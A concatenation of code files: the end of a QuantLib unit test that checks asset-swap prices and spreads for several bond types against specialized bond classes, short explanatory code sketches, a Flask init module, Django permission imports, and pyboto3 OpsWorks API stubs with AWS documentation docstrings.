floatingSpecializedBondASWSpread1 = floatingSpecializedBondASW1.fairSpread()
error6 = abs(floatingBondASWSpread1-floatingSpecializedBondASWSpread1)
self.assertFalse(error6>tolerance,
"wrong asw spread for fixed bond:"
+ "\n generic frn rate bond's asw spread: " + str(floatingBondASWSpread1)
+ "\n equivalent specialized bond's asw spread: " + str(floatingSpecializedBondASWSpread1)
+ "\n error: " + str(error6)
+ "\n tolerance: " + str(tolerance))
##FRN bond (Isin: XS0090566539 COE 0 09/24/18)
##maturity occurs on a business day
floatingBondStartDate2 = Date(24,September,2004)
floatingBondMaturityDate2 = Date(24,September,2018)
floatingBondSchedule2 = Schedule(floatingBondStartDate2,
floatingBondMaturityDate2,
Period(Semiannual), bondCalendar,
ModifiedFollowing, ModifiedFollowing,
DateGeneration.Backward, False)
floatingBondLeg2 = list(IborLeg([self.faceAmount],floatingBondSchedule2, self.iborIndex,
Actual360(),ModifiedFollowing,[fixingDays],[],[0.0025],[],[],inArrears))
floatingbondRedemption2 = bondCalendar.adjust(floatingBondMaturityDate2, ModifiedFollowing)
floatingBondLeg2.append(SimpleCashFlow(100.0, floatingbondRedemption2))
## generic bond
floatingBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
floatingBondMaturityDate2, floatingBondStartDate2,
floatingBondLeg2)
floatingBond2.setPricingEngine(bondEngine)
## equivalent specialized floater
floatingSpecializedBond2 = FloatingRateBond(settlementDays, self.faceAmount,
floatingBondSchedule2,
self.iborIndex, Actual360(),
ModifiedFollowing, fixingDays,
[1],
[0.0025],
[], [],
inArrears,
100.0, Date(24,September,2004))
floatingSpecializedBond2.setPricingEngine(bondEngine)
setCouponPricer(floatingBond2.cashflows(), self.pricer)
setCouponPricer(floatingSpecializedBond2.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(22,March,2007), 0.04013)
floatingBondPrice2 = floatingBond2.cleanPrice()
floatingSpecializedBondPrice2= floatingSpecializedBond2.cleanPrice()
floatingBondAssetSwap2 = AssetSwap(payFixedRate,
floatingBond2, floatingBondPrice2,
self.iborIndex, self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingBondAssetSwap2.setPricingEngine(swapEngine)
floatingSpecializedBondAssetSwap2 = AssetSwap(payFixedRate,
floatingSpecializedBond2,
floatingSpecializedBondPrice2,
self.iborIndex,
self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingSpecializedBondAssetSwap2.setPricingEngine(swapEngine)
floatingBondAssetSwapPrice2 = floatingBondAssetSwap2.fairCleanPrice()
floatingSpecializedBondAssetSwapPrice2 = floatingSpecializedBondAssetSwap2.fairCleanPrice()
error7 = abs(floatingBondAssetSwapPrice2-floatingSpecializedBondAssetSwapPrice2)
self.assertFalse(error7>tolerance,
"wrong clean price for frnbond:"
+ "\n generic frn rate bond's clean price: " + str(floatingBondAssetSwapPrice2)
+ "\n equivalent specialized frn bond's price: " + str(floatingSpecializedBondAssetSwapPrice2)
+ "\n error: " + str(error7)
+ "\n tolerance: " + str(tolerance))
## market executable price as of 4th sept 2007
floatingBondMktPrice2 = 101.26
floatingBondASW2 = AssetSwap(payFixedRate,
floatingBond2, floatingBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingBondASW2.setPricingEngine(swapEngine)
floatingSpecializedBondASW2 = AssetSwap(payFixedRate,
floatingSpecializedBond2,
floatingBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingSpecializedBondASW2.setPricingEngine(swapEngine)
floatingBondASWSpread2 = floatingBondASW2.fairSpread()
floatingSpecializedBondASWSpread2 = floatingSpecializedBondASW2.fairSpread()
error8 = abs(floatingBondASWSpread2-floatingSpecializedBondASWSpread2)
self.assertFalse(error8>tolerance,
"wrong asw spread for frn bond:"
+ "\n generic frn rate bond's asw spread: " + str(floatingBondASWSpread2)
+ "\n equivalent specialized bond's asw spread: " + str(floatingSpecializedBondASWSpread2)
+ "\n error: " + str(error8)
+ "\n tolerance: " + str(tolerance))
## CMS bond (Isin: XS0228052402 CRDIT 0 8/22/20)
## maturity doesn't occur on a business day
cmsBondStartDate1 = Date(22,August,2005)
cmsBondMaturityDate1 = Date(22,August,2020)
cmsBondSchedule1 = Schedule(cmsBondStartDate1,
cmsBondMaturityDate1,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBondLeg1 = list(CmsLeg([self.faceAmount],cmsBondSchedule1, self.swapIndex,
Thirty360(),Following,[fixingDays], [],[],[0.055],[0.025],inArrears))
cmsbondRedemption1 = bondCalendar.adjust(cmsBondMaturityDate1,Following)
cmsBondLeg1.append(SimpleCashFlow(100.0, cmsbondRedemption1))
## generic cms bond
cmsBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
cmsBondMaturityDate1, cmsBondStartDate1, cmsBondLeg1)
cmsBond1.setPricingEngine(bondEngine)
## equivalent specialized cms bond
cmsSpecializedBond1 = CmsRateBond(settlementDays, self.faceAmount, cmsBondSchedule1,
self.swapIndex, Thirty360(),
Following, fixingDays,
[1.0], [0.0],
[0.055], [0.025],
inArrears,
100.0, Date(22,August,2005))
cmsSpecializedBond1.setPricingEngine(bondEngine)
setCouponPricer(cmsBond1.cashflows(), self.cmspricer)
setCouponPricer(cmsSpecializedBond1.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(18,August,2006), 0.04158)
cmsBondPrice1 = cmsBond1.cleanPrice()
cmsSpecializedBondPrice1 = cmsSpecializedBond1.cleanPrice()
cmsBondAssetSwap1 = AssetSwap(payFixedRate,cmsBond1, cmsBondPrice1,
self.iborIndex, self.nonnullspread,
Schedule(),self.iborIndex.dayCounter(),
parAssetSwap)
cmsBondAssetSwap1.setPricingEngine(swapEngine)
cmsSpecializedBondAssetSwap1 = AssetSwap(payFixedRate,cmsSpecializedBond1,
cmsSpecializedBondPrice1,
self.iborIndex,
self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsSpecializedBondAssetSwap1.setPricingEngine(swapEngine)
cmsBondAssetSwapPrice1 = cmsBondAssetSwap1.fairCleanPrice()
cmsSpecializedBondAssetSwapPrice1 = cmsSpecializedBondAssetSwap1.fairCleanPrice()
error9 = abs(cmsBondAssetSwapPrice1-cmsSpecializedBondAssetSwapPrice1)
self.assertFalse(error9>tolerance,
"wrong clean price for cmsbond:"
+ "\n generic bond's clean price: " + str(cmsBondAssetSwapPrice1)
+ "\n equivalent specialized cms rate bond's price: " + str(cmsSpecializedBondAssetSwapPrice1)
+ "\n error: " + str(error9)
+ "\n tolerance: " + str(tolerance))
cmsBondMktPrice1 = 87.02  ## market executable price as of 4th sept 2007
cmsBondASW1 = AssetSwap(payFixedRate,
cmsBond1, cmsBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsBondASW1.setPricingEngine(swapEngine)
cmsSpecializedBondASW1 = AssetSwap(payFixedRate,
cmsSpecializedBond1,
cmsBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsSpecializedBondASW1.setPricingEngine(swapEngine)
cmsBondASWSpread1 = cmsBondASW1.fairSpread()
cmsSpecializedBondASWSpread1 = cmsSpecializedBondASW1.fairSpread()
error10 = abs(cmsBondASWSpread1-cmsSpecializedBondASWSpread1)
self.assertFalse(error10>tolerance,
"wrong asw spread for cm bond:"
+ "\n generic cms rate bond's asw spread: " + str(cmsBondASWSpread1)
+ "\n equivalent specialized bond's asw spread: " + str(cmsSpecializedBondASWSpread1)
+ "\n error: " + str(error10)
+ "\n tolerance: " + str(tolerance))
##CMS bond (Isin: XS0218766664 ISPIM 0 5/6/15)
##maturity occurs on a business day
cmsBondStartDate2 = Date(6,May,2005)
cmsBondMaturityDate2 = Date(6,May,2015)
cmsBondSchedule2 = Schedule(cmsBondStartDate2,
cmsBondMaturityDate2,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBondLeg2 = list(CmsLeg([self.faceAmount],cmsBondSchedule2, self.swapIndex,
Thirty360(), Following, [fixingDays] , [0.84],[],[],[],inArrears))
cmsbondRedemption2 = bondCalendar.adjust(cmsBondMaturityDate2,
Following)
cmsBondLeg2.append(SimpleCashFlow(100.0, cmsbondRedemption2))
## generic bond
cmsBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
cmsBondMaturityDate2, cmsBondStartDate2, cmsBondLeg2)
cmsBond2.setPricingEngine(bondEngine)
## equivalent specialized cms bond
cmsSpecializedBond2 = CmsRateBond(settlementDays, self.faceAmount, cmsBondSchedule2,
self.swapIndex, Thirty360(),
Following, fixingDays,
[0.84], [0.0],
[], [],
inArrears,
100.0, Date(6,May,2005))
cmsSpecializedBond2.setPricingEngine(bondEngine)
setCouponPricer(cmsBond2.cashflows(), self.cmspricer)
setCouponPricer(cmsSpecializedBond2.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(4,May,2006), 0.04217)
cmsBondPrice2 = cmsBond2.cleanPrice()
cmsSpecializedBondPrice2 = cmsSpecializedBond2.cleanPrice()
cmsBondAssetSwap2 = AssetSwap(payFixedRate,cmsBond2, cmsBondPrice2,
self.iborIndex, self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsBondAssetSwap2.setPricingEngine(swapEngine)
cmsSpecializedBondAssetSwap2 = AssetSwap(payFixedRate,cmsSpecializedBond2,
cmsSpecializedBondPrice2,
self.iborIndex,
self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsSpecializedBondAssetSwap2.setPricingEngine(swapEngine)
cmsBondAssetSwapPrice2 = cmsBondAssetSwap2.fairCleanPrice()
cmsSpecializedBondAssetSwapPrice2 = cmsSpecializedBondAssetSwap2.fairCleanPrice()
error11 = abs(cmsBondAssetSwapPrice2-cmsSpecializedBondAssetSwapPrice2)
self.assertFalse(error11>tolerance,
"wrong clean price for cmsbond:"
+ "\n generic bond's clean price: " + str(cmsBondAssetSwapPrice2)
+ "\n equivalent specialized cms rate bond's price: " + str(cmsSpecializedBondAssetSwapPrice2)
+ "\n error: " + str(error11)
+ "\n tolerance: " + str(tolerance))
cmsBondMktPrice2 = 94.35  ## market executable price as of 4th sept 2007
cmsBondASW2 = AssetSwap(payFixedRate,
cmsBond2, cmsBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsBondASW2.setPricingEngine(swapEngine)
cmsSpecializedBondASW2 = AssetSwap(payFixedRate,
cmsSpecializedBond2,
cmsBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsSpecializedBondASW2.setPricingEngine(swapEngine)
cmsBondASWSpread2 = cmsBondASW2.fairSpread()
cmsSpecializedBondASWSpread2 = cmsSpecializedBondASW2.fairSpread()
error12 = abs(cmsBondASWSpread2-cmsSpecializedBondASWSpread2)
self.assertFalse(error12>tolerance,
"wrong asw spread for cm bond:"
+ "\n generic cms rate bond's asw spread: " + str(cmsBondASWSpread2)
+ "\n equivalent specialized bond's asw spread: " + str(cmsSpecializedBondASWSpread2)
+ "\n error: " + str(error12)
+ "\n tolerance: " + str(tolerance))
## Zero-Coupon bond (Isin: DE0004771662 IBRD 0 12/20/15)
## maturity doesn't occur on a business day
zeroCpnBondStartDate1 = Date(19,December,1985)
zeroCpnBondMaturityDate1 = Date(20,December,2015)
zeroCpnBondRedemption1 = bondCalendar.adjust(zeroCpnBondMaturityDate1, Following)
zeroCpnBondLeg1 = Leg([SimpleCashFlow(100.0, zeroCpnBondRedemption1)])
## generic bond
zeroCpnBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
zeroCpnBondMaturityDate1, zeroCpnBondStartDate1, zeroCpnBondLeg1)
zeroCpnBond1.setPricingEngine(bondEngine)
## specialized zerocpn bond
zeroCpnSpecializedBond1 = ZeroCouponBond(settlementDays, bondCalendar, self.faceAmount,
Date(20,December,2015),
Following,
100.0, Date(19,December,1985))
zeroCpnSpecializedBond1.setPricingEngine(bondEngine)
zeroCpnBondPrice1 = zeroCpnBond1.cleanPrice()
zeroCpnSpecializedBondPrice1 = zeroCpnSpecializedBond1.cleanPrice()
zeroCpnBondAssetSwap1 = AssetSwap(payFixedRate,zeroCpnBond1,
zeroCpnBondPrice1,
self.iborIndex, self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnBondAssetSwap1.setPricingEngine(swapEngine)
zeroCpnSpecializedBondAssetSwap1 = AssetSwap(payFixedRate,
zeroCpnSpecializedBond1,
zeroCpnSpecializedBondPrice1,
self.iborIndex,
self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnSpecializedBondAssetSwap1.setPricingEngine(swapEngine)
zeroCpnBondAssetSwapPrice1 = zeroCpnBondAssetSwap1.fairCleanPrice()
zeroCpnSpecializedBondAssetSwapPrice1 = zeroCpnSpecializedBondAssetSwap1.fairCleanPrice()
error13 = abs(zeroCpnBondAssetSwapPrice1-zeroCpnSpecializedBondAssetSwapPrice1)
self.assertFalse(error13>tolerance,
"wrong clean price for zerocpn bond:"
+ "\n generic zero cpn bond's clean price: " + str(zeroCpnBondAssetSwapPrice1)
+ "\n specialized equivalent bond's price: " + str(zeroCpnSpecializedBondAssetSwapPrice1)
+ "\n error: " + str(error13)
+ "\n tolerance: " + str(tolerance))
## market executable price as of 4th sept 2007
zeroCpnBondMktPrice1 = 72.277
zeroCpnBondASW1 = AssetSwap(payFixedRate,
zeroCpnBond1,zeroCpnBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnBondASW1.setPricingEngine(swapEngine)
zeroCpnSpecializedBondASW1 = AssetSwap(payFixedRate,
zeroCpnSpecializedBond1,
zeroCpnBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnSpecializedBondASW1.setPricingEngine(swapEngine)
zeroCpnBondASWSpread1 = zeroCpnBondASW1.fairSpread()
zeroCpnSpecializedBondASWSpread1 = zeroCpnSpecializedBondASW1.fairSpread()
error14 = abs(zeroCpnBondASWSpread1-zeroCpnSpecializedBondASWSpread1)
self.assertFalse(error14>tolerance,
"wrong asw spread for zeroCpn bond:"
+ "\n generic zeroCpn bond's asw spread: " + str(zeroCpnBondASWSpread1)
+ "\n equivalent specialized bond's asw spread: " + str(zeroCpnSpecializedBondASWSpread1)
+ "\n error: " + str(error14)
+ "\n tolerance: " + str(tolerance))
## Zero Coupon bond (Isin: IT0001200390 ISPIM 0 02/17/28)
## maturity occurs on a business day
zeroCpnBondStartDate2 = Date(17,February,1998)
zeroCpnBondMaturityDate2 = Date(17,February,2028)
zerocpbondRedemption2 = bondCalendar.adjust(zeroCpnBondMaturityDate2, Following)
zeroCpnBondLeg2 = Leg([SimpleCashFlow(100.0, zerocpbondRedemption2)])
## generic bond
zeroCpnBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
zeroCpnBondMaturityDate2, zeroCpnBondStartDate2, zeroCpnBondLeg2)
zeroCpnBond2.setPricingEngine(bondEngine)
## specialized zerocpn bond
zeroCpnSpecializedBond2 = ZeroCouponBond(settlementDays, bondCalendar, self.faceAmount,
Date(17,February,2028),
Following,
100.0, Date(17,February,1998))
zeroCpnSpecializedBond2.setPricingEngine(bondEngine)
zeroCpnBondPrice2 = zeroCpnBond2.cleanPrice()
zeroCpnSpecializedBondPrice2 = zeroCpnSpecializedBond2.cleanPrice()
zeroCpnBondAssetSwap2 = AssetSwap(payFixedRate,zeroCpnBond2,
zeroCpnBondPrice2,
self.iborIndex, self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnBondAssetSwap2.setPricingEngine(swapEngine)
zeroCpnSpecializedBondAssetSwap2 = AssetSwap(payFixedRate,
zeroCpnSpecializedBond2,
zeroCpnSpecializedBondPrice2,
self.iborIndex,
self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnSpecializedBondAssetSwap2.setPricingEngine(swapEngine)
zeroCpnBondAssetSwapPrice2 = zeroCpnBondAssetSwap2.fairCleanPrice()
zeroCpnSpecializedBondAssetSwapPrice2 = zeroCpnSpecializedBondAssetSwap2.fairCleanPrice()
error15 = abs(zeroCpnBondAssetSwapPrice2 -zeroCpnSpecializedBondAssetSwapPrice2)
self.assertFalse(error15>tolerance,
"wrong clean price for zerocpn bond:"
+ "\n generic zero cpn bond's clean price: " + str(zeroCpnBondAssetSwapPrice2)
+ "\n equivalent specialized bond's price: " + str(zeroCpnSpecializedBondAssetSwapPrice2)
+ "\n error: " + str(error15)
+ "\n tolerance: " + str(tolerance))
## market executable price as of 4th sept 2007
zeroCpnBondMktPrice2 = 72.277
zeroCpnBondASW2 = AssetSwap(payFixedRate,
zeroCpnBond2,zeroCpnBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnBondASW2.setPricingEngine(swapEngine)
zeroCpnSpecializedBondASW2 = AssetSwap(payFixedRate,
zeroCpnSpecializedBond2,
zeroCpnBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnSpecializedBondASW2.setPricingEngine(swapEngine)
zeroCpnBondASWSpread2 = zeroCpnBondASW2.fairSpread()
zeroCpnSpecializedBondASWSpread2 = zeroCpnSpecializedBondASW2.fairSpread()
error16 = abs(zeroCpnBondASWSpread2-zeroCpnSpecializedBondASWSpread2)
self.assertFalse(error16>tolerance,
"wrong asw spread for zeroCpn bond:"
+ "\n generic zeroCpn bond's asw spread: " + str(zeroCpnBondASWSpread2)
+ "\n equivalent specialized bond's asw spread: " + str(zeroCpnSpecializedBondASWSpread2)
+ "\n error: " + str(error16)
+ "\n tolerance: " + str(tolerance))
if __name__ == '__main__':
print('testing QuantLib ' + QuantLib.__version__)
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(AssetSwapTest,'test'))
unittest.TextTestRunner(verbosity=2).run(suite)
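Every assertion in the suite above follows the same pattern: price the bond two ways (generic bond vs. equivalent specialized bond), take the absolute difference, and fail with a diagnostic message if it exceeds a tolerance. A QuantLib-free sketch of that pattern, with illustrative numbers in place of real pricing results:

```python
import unittest

def price_error(generic, specialized):
    """Absolute difference between the two pricing paths."""
    return abs(generic - specialized)

class ComparisonPattern(unittest.TestCase):
    tolerance = 1.0e-13  # illustrative; the suite above defines its own

    def test_specialized_matches_generic(self):
        # Both paths should agree to within the tolerance.
        error = price_error(72.277, 72.277)
        self.assertFalse(error > self.tolerance,
                         "wrong clean price:"
                         + "\n  error: " + str(error)
                         + "\n  tolerance: " + str(self.tolerance))

# Run just this case without a global test runner:
result = unittest.TextTestRunner(verbosity=0).run(
    unittest.defaultTestLoader.loadTestsFromTestCase(ComparisonPattern))
```

Keeping the error and tolerance in the failure message, as the suite does, makes a numerical regression immediately diagnosable from the test log.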
# gcpflask/__init__.py (stanford-rc/gcp-flask-stanford, MIT)
from .server import app
from . import views
def create_app():
return app
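`create_app()` here returns a module-level singleton imported from `.server`. A more typical application factory constructs a fresh app per call so that configuration can differ per environment; a framework-free sketch of that pattern (the `App` class is a stand-in for `flask.Flask`, not part of this repo):

```python
class App:
    """Stand-in for a web application object (e.g. flask.Flask)."""
    def __init__(self, name):
        self.name = name
        self.config = {}

def create_app(config=None):
    """Build a new application instance per call, applying config overrides."""
    app = App("gcpflask")
    if config:
        app.config.update(config)
    return app

# Each call yields an independent instance with its own configuration:
dev = create_app({"DEBUG": True})
prod = create_app({"DEBUG": False})
```

The singleton style used above is simpler, but a per-call factory makes testing easier because each test can build an isolated app.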
# products/permissions/products.py (julianarchila/ecommerce-django-api, MIT)
""" Products custom permissions. """
# Django REST Framework
from rest_framework.permissions import BasePermission, IsAdminUser
# pyboto3/opsworks.py (thecraftman/pyboto3, MIT)
'''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def assign_instance(InstanceId=None, LayerIds=None):
"""
Assign a registered instance to a layer.
See also: AWS API Documentation
:example: response = client.assign_instance(
InstanceId='string',
LayerIds=[
'string',
]
)
:type InstanceId: string
:param InstanceId: [REQUIRED]
The instance ID.
:type LayerIds: list
:param LayerIds: [REQUIRED]
The layer ID, which must correspond to a custom layer. You cannot assign a registered instance to a built-in layer.
(string) --
:returns:
InstanceId (string) -- [REQUIRED]
The instance ID.
LayerIds (list) -- [REQUIRED]
The layer ID, which must correspond to a custom layer. You cannot assign a registered instance to a built-in layer.
(string) --
"""
pass
def assign_volume(VolumeId=None, InstanceId=None):
"""
Assigns one of the stack's registered Amazon EBS volumes to a specified instance. The volume must first be registered with the stack by calling RegisterVolume . After you register the volume, you must call UpdateVolume to specify a mount point before calling AssignVolume . For more information, see Resource Management .
See also: AWS API Documentation
:example: response = client.assign_volume(
VolumeId='string',
InstanceId='string'
)
:type VolumeId: string
:param VolumeId: [REQUIRED]
The volume ID.
:type InstanceId: string
:param InstanceId: The instance ID.
"""
pass
def associate_elastic_ip(ElasticIp=None, InstanceId=None):
"""
Associates one of the stack's registered Elastic IP addresses with a specified instance. The address must first be registered with the stack by calling RegisterElasticIp . For more information, see Resource Management .
See also: AWS API Documentation
:example: response = client.associate_elastic_ip(
ElasticIp='string',
InstanceId='string'
)
:type ElasticIp: string
:param ElasticIp: [REQUIRED]
The Elastic IP address.
:type InstanceId: string
:param InstanceId: The instance ID.
"""
pass
def attach_elastic_load_balancer(ElasticLoadBalancerName=None, LayerId=None):
"""
Attaches an Elastic Load Balancing load balancer to a specified layer. For more information, see Elastic Load Balancing .
See also: AWS API Documentation
:example: response = client.attach_elastic_load_balancer(
ElasticLoadBalancerName='string',
LayerId='string'
)
:type ElasticLoadBalancerName: string
:param ElasticLoadBalancerName: [REQUIRED]
The Elastic Load Balancing instance's name.
:type LayerId: string
:param LayerId: [REQUIRED]
The ID of the layer that the Elastic Load Balancing instance is to be attached to.
"""
pass
def can_paginate(operation_name=None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is create_foo, and you'd normally invoke the
operation as client.create_foo(**kwargs), if the
create_foo operation can be paginated, you can use the
call client.get_paginator('create_foo').
"""
pass
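The docstring above relates client method names like `create_foo` to API operations. botocore derives such snake_case method names from the CamelCase operation names in the service model; the transform below is an illustrative approximation, not botocore's actual `xform_name`:

```python
import re

def snake_case_operation(name):
    """Convert a CamelCase API operation name to a client method name."""
    s = re.sub(r"(.)([A-Z][a-z]+)", r"\1_\2", name)   # split WordBoundaries
    s = re.sub(r"([a-z0-9])([A-Z])", r"\1_\2", s)     # split trailing caps
    return s.lower()

# e.g. the OpsWorks operations documented in this module:
print(snake_case_operation("AssignInstance"))    # assign_instance
print(snake_case_operation("CloneStack"))        # clone_stack
print(snake_case_operation("CreateDeployment"))  # create_deployment
```

The resulting method name is also the string you would pass to `client.get_paginator(...)` when the operation supports pagination.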
def clone_stack(SourceStackId=None, Name=None, Region=None, VpcId=None, Attributes=None, ServiceRoleArn=None, DefaultInstanceProfileArn=None, DefaultOs=None, HostnameTheme=None, DefaultAvailabilityZone=None, DefaultSubnetId=None, CustomJson=None, ConfigurationManager=None, ChefConfiguration=None, UseCustomCookbooks=None, UseOpsworksSecurityGroups=None, CustomCookbooksSource=None, DefaultSshKeyName=None, ClonePermissions=None, CloneAppIds=None, DefaultRootDeviceType=None, AgentVersion=None):
"""
Creates a clone of a specified stack. For more information, see Clone a Stack . By default, all parameters are set to the values used by the parent stack.
See also: AWS API Documentation
:example: response = client.clone_stack(
SourceStackId='string',
Name='string',
Region='string',
VpcId='string',
Attributes={
'string': 'string'
},
ServiceRoleArn='string',
DefaultInstanceProfileArn='string',
DefaultOs='string',
HostnameTheme='string',
DefaultAvailabilityZone='string',
DefaultSubnetId='string',
CustomJson='string',
ConfigurationManager={
'Name': 'string',
'Version': 'string'
},
ChefConfiguration={
'ManageBerkshelf': True|False,
'BerkshelfVersion': 'string'
},
UseCustomCookbooks=True|False,
UseOpsworksSecurityGroups=True|False,
CustomCookbooksSource={
'Type': 'git'|'svn'|'archive'|'s3',
'Url': 'string',
'Username': 'string',
'Password': 'string',
'SshKey': 'string',
'Revision': 'string'
},
DefaultSshKeyName='string',
ClonePermissions=True|False,
CloneAppIds=[
'string',
],
DefaultRootDeviceType='ebs'|'instance-store',
AgentVersion='string'
)
:type SourceStackId: string
:param SourceStackId: [REQUIRED]
The source stack ID.
:type Name: string
:param Name: The cloned stack name.
:type Region: string
:param Region: The cloned stack AWS region, such as 'ap-northeast-2'. For more information about AWS regions, see Regions and Endpoints .
:type VpcId: string
:param VpcId: The ID of the VPC that the cloned stack is to be launched into. It must be in the specified region. All instances are launched into this VPC, and you cannot change the ID later.
If your account supports EC2 Classic, the default value is no VPC.
If your account does not support EC2 Classic, the default value is the default VPC for the specified region.
If the VPC ID corresponds to a default VPC and you have specified either the DefaultAvailabilityZone or the DefaultSubnetId parameter only, AWS OpsWorks Stacks infers the value of the other parameter. If you specify neither parameter, AWS OpsWorks Stacks sets these parameters to the first valid Availability Zone for the specified region and the corresponding default VPC subnet ID, respectively.
If you specify a nondefault VPC ID, note the following:
It must belong to a VPC in your account that is in the specified region.
You must specify a value for DefaultSubnetId .
For more information on how to use AWS OpsWorks Stacks with a VPC, see Running a Stack in a VPC . For more information on default VPC and EC2 Classic, see Supported Platforms .
:type Attributes: dict
:param Attributes: A list of stack attributes and values as key/value pairs to be added to the cloned stack.
(string) --
(string) --
:type ServiceRoleArn: string
:param ServiceRoleArn: [REQUIRED]
The stack AWS Identity and Access Management (IAM) role, which allows AWS OpsWorks Stacks to work with AWS resources on your behalf. You must set this parameter to the Amazon Resource Name (ARN) for an existing IAM role. If you create a stack by using the AWS OpsWorks Stacks console, it creates the role for you. You can obtain an existing stack's IAM ARN programmatically by calling DescribePermissions . For more information about IAM ARNs, see Using Identifiers .
Note
You must set this parameter to a valid service role ARN or the action will fail; there is no default value. You can specify the source stack's service role ARN, if you prefer, but you must do so explicitly.
:type DefaultInstanceProfileArn: string
:param DefaultInstanceProfileArn: The Amazon Resource Name (ARN) of an IAM profile that is the default profile for all of the stack's EC2 instances. For more information about IAM ARNs, see Using Identifiers .
:type DefaultOs: string
:param DefaultOs: The stack's operating system, which must be set to one of the following.
A supported Linux operating system: An Amazon Linux version, such as Amazon Linux 2016.09 , Amazon Linux 2016.03 , Amazon Linux 2015.09 , or Amazon Linux 2015.03 .
A supported Ubuntu operating system, such as Ubuntu 16.04 LTS , Ubuntu 14.04 LTS , or Ubuntu 12.04 LTS .
CentOS Linux 7
Red Hat Enterprise Linux 7
Microsoft Windows Server 2012 R2 Base , Microsoft Windows Server 2012 R2 with SQL Server Express , Microsoft Windows Server 2012 R2 with SQL Server Standard , or Microsoft Windows Server 2012 R2 with SQL Server Web .
A custom AMI: Custom . You specify the custom AMI you want to use when you create instances. For more information on how to use custom AMIs with OpsWorks, see Using Custom AMIs .
The default option is the parent stack's operating system. For more information on the supported operating systems, see AWS OpsWorks Stacks Operating Systems .
Note
You can specify a different Linux operating system for the cloned stack, but you cannot change from Linux to Windows or Windows to Linux.
:type HostnameTheme: string
:param HostnameTheme: The stack's host name theme, with spaces replaced by underscores. The theme is used to generate host names for the stack's instances. By default, HostnameTheme is set to Layer_Dependent , which creates host names by appending integers to the layer's short name. The other themes are:
Baked_Goods
Clouds
Europe_Cities
Fruits
Greek_Deities
Legendary_creatures_from_Japan
Planets_and_Moons
Roman_Deities
Scottish_Islands
US_Cities
Wild_Cats
To obtain a generated host name, call GetHostNameSuggestion , which returns a host name based on the current theme.
:type DefaultAvailabilityZone: string
:param DefaultAvailabilityZone: The cloned stack's default Availability Zone, which must be in the specified region. For more information, see Regions and Endpoints . If you also specify a value for DefaultSubnetId , the subnet must be in the same zone. For more information, see the VpcId parameter description.
:type DefaultSubnetId: string
:param DefaultSubnetId: The stack's default VPC subnet ID. This parameter is required if you specify a value for the VpcId parameter. All instances are launched into this subnet unless you specify otherwise when you create the instance. If you also specify a value for DefaultAvailabilityZone , the subnet must be in that zone. For information on default values and when this parameter is required, see the VpcId parameter description.
:type CustomJson: string
:param CustomJson: A string that contains user-defined, custom JSON. It is used to override the corresponding default stack configuration JSON values. The string should be in the following format:
'{\'key1\': \'value1\', \'key2\': \'value2\',...}'
For more information on custom JSON, see Use Custom JSON to Modify the Stack Configuration Attributes
:type ConfigurationManager: dict
